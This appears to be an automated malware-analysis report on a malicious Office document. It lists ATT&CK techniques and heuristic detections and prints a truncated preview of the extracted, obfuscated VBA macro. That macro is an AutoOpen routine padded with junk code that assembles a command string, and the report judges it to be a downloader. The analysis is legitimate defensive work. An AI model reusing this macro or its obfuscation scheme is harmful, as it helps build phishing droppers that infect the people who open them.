MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and configured to execute, indicating an attempt to run malicious code upon opening. The presence of 'GetObject' and 'PCODE_AUTOEXEC_EXEC' heuristics further confirms the execution of VBA code. While the exact payload is not discernible due to obfuscation, the macro's structure suggests it is designed to download and execute a secondary stage.
Heuristics (7)
- ClamAV: Doc.Malware.Generic-6666852-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6666852-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59568 bytes |

SHA-256: d9b1e93bacd83d5acb453311d5c4af8bba6074dad4c76611114d393f3b0b861b

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub POGiseLUtoJyvEwoze()
iOhuXYToDIVe = Val("14204.9") & "zYjoveieGaQ"
Dim DyPuWifYkEWuviRUiava
For DyPuWifYkEWuviRUiava = 3 To 11
Dim rADAnYLAzHuNegubYHuXAdY
rADAnYLAzHuNegubYHuXAdY = Fix(77563)
Next
Dim VOHoBuKuHAwyB
VOHoBuKuHAwyB = Rnd(116)
If VOHoBuKuHAwyB > 70637 Then
HoWEKutbiSOdO = 37589
VOHoBuKuHAwyB = Exp(6)
End If
Dim QIMAqoQiGlE
For QIMAqoQiGlE = 4 To 10
Dim REPanafUVaXi
REPanafUVaXi = Fix(72077)
Next
vizUlyziwOSOnEtykUk = 60841
End Sub
Sub AutoOpen()
niTyjukaRYxiTEMEgOBiUdo = Val("78120.2") & "gYgEvUdAfURowEXAWevYWEk"
On Error Resume Next
Dim huNQOsiVezYf
huNQOsiVezYf = Rnd(111)
If huNQOsiVezYf > 34670 Then
huNQOsiVezYf = Exp(1)
End If
Debug.Print "kYgaXIFigYne"
cUMwOxEHUsAlDeKi = 13416
Debug.Print "gATywuDIaiQOt"
Dim lISIPAnOWiRFoROPuReD
For lISIPAnOWiRFoROPuReD = 7 To 11
Dim aIxYdiZihefapI
aIxYdiZihefapI = Fix(42481)
Next
DybUXUloZyvUvaDEQimiWe = Val("27819.3") & "wYgozeioHAm"
Dim DiZUqoiIDuSOlUbYQORIlO
For DiZUqoiIDuSOlUbYQORIlO = 5 To 13
Dim viCafeRevtAkAgIfIXIs
viCafeRevtAkAgIfIXIs = Fix(36329)
Next
XykAZuGErEPYZeLiJeWOrYU = ""
kEWonIXUcibAXAk = 51440
RehiGeLomyfABAM = InStr("fIqAjoiukazatusAaY", "fIqAjoiukazatusAaYfIqAjoiukazatusAaY")
pUBecIbonatiYLyPu = Val("63384.7") & "GyfaaAWoFoToMErA"
BIjUWevEjYQyNOPyTIsyHAtI = InStr("nYrvovduKyjiLu", "nYrvovduKyjiLunYrvovduKyjiLu")
Dim rExEWeQUxave
rExEWeQUxave = Rnd(124)
If rExEWeQUxave > 15844 Then
Dim KoqyNVOkAmOSoqeVahojiz
For KoqyNVOkAmOSoqeVahojiz = 3 To 11
Dim HyaFAfexuVuh
HyaFAfexuVuh = Fix(14483)
Next
Dim XewmhUXeXIvIh
XewmhUXeXIvIh = Log(2)
XewmhUXeXIvIh = XewmhUXeXIvIh + Log(12)
rExEWeQUxave = Exp(4)
End If
Debug.Print "wuJAVEPILIokaK"
Dim ROxeLOXYPyWYdypSB
ROxeLOXYPyWYdypSB = Rnd(135)
If ROxeLOXYPyWYdypSB > 38244 Then
ROxeLOXYPyWYdypSB = Exp(5)
End If
ieZAgoXApIPET = Val("53166.9") & "aOgEQIkYSeJAxiCY"
Dim GuviSekALuj
FArIfeuZAkUPojuTaT = 4359
lIaEjiSUhIDIVYS = 79151
For GuviSekALuj = 4 To 10
Dim ZOqAGuJISInygIROtySUnul
ZOqAGuJISInygIROtySUnul = Fix(60520)
Dim luToVaGEaipyfOWufISiiYCE
For luToVaGEaipyfOWufISiiYCE = 4 To 13
Dim GAzifasMeweNUhIdibEGYBe
GAzifasMeweNUhIdibEGYBe = Fix(19354)
Next
Debug.Print "cYVEwUJYTOKeRAbex"
Next
neRASYPANOZaR = Val("57216.10") & "vErOpiBelyHUODixyz"
Debug.Print "lOiaIFAMakiXoQIfA"
XykAZuGErEPYZeLiJeWOrYU = XykAZuGErEPYZeLiJeWOrYU + IIf((46 + 92) = 138, "sc", "byj")
QEcgEPIziaaGe = Val("737.10") & "kUcoctaSAiONUGRyn"
Dim SaloHopODyyreXIRu
VasUSyMihEkGAQEm = InStr("aawobEJujUK", "aawobEJujUKaawobEJujUK")
For SaloHopODyyreXIRu = 7 To 10
uLAsFotAX = Val("56355.2") & "WiFhUGequXaxAkYsEbs"
Debug.Print "LAfUbObWODExiTipitykiB"
Dim loMyXOgeNoLeVAteVuZYgEC
SgiMyCYPAPeNeGwICuTIFi = 36795
loMyXOgeNoLeVAteVuZYgEC = Fix(41722)
Debug.Print "fEdOcOcvimYgyieluiAO"
FaiQikUWAqUf = InStr("liPoqApAZyJEQUm", "liPoqApAZyJEQUmliPoqApAZyJEQUm")
Next
Dim agigIgYjObExUnI
For agigIgYjObExUnI = 7 To 10
Dim nExAPUPqEROnULU
nExAPUPqEROnULU = Fix(51529)
Next
DYQeVEqaZoSYQOs = 25807
Dim JegOLuCenqojUtyNYG
JegOLuCenqojUtyNYG = Log(8)
Dim ZEqyBoJOXUaIgeRuaEv
ZEqyBoJOXUaIgeRuaEv = Rnd(117)
If ZEqyBoJOXUaIgeRuaEv > 18630 Then
ZEqyBoJOXUaIgeRuaEv = Exp(7)
End If
Dim BwEGaZpAdOqihokUSeNA
BwEGaZpAdOqihokUSeNA = Rnd(123)
If BwEGaZpAdOqihokUSeNA > 65091 Then
BwEGaZpAdOqihokUSeNA = Exp(3)
End If
JegOLuCenqojUtyNYG = JegOLuCenqojUtyNYG + Log(11)
qOfiSAxoWYqAVO = InStr("sImycuRyfELUGESihuv", "sImycuRyfELUGESihuvsImycuRyfELUGESihuv")
XykAZuGErEPYZeLiJeWOrYU = XykAZuGErEPYZeLiJeWOrYU + IIf((177 + 354) = 531, "ri", "Khx")
Dim kujuWeJitoiEV
Dim QogEvaBOcIzaniZerudE
QogEvaBOcIzaniZerudE = Log(9)
QogEvaBOcIzaniZerudE = QogEvaBOcIzaniZerudE + Log(10)
kujuWeJitoiEV = Log(1)
... (truncated)